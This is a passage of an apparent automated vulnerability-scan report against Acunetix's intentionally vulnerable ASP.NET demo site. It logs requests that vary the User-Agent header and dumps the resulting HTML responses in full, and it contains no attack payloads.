cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Show / hide Request and Response
Request Header - size: 274 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=exrudu55ch4n5h453c05vu45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:16 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 179 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=vtg25r45oe1tvgv4dj5jzhqs; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:16 GMT Content-Length: 14133
Response Body - size: 14,133 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>December 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a 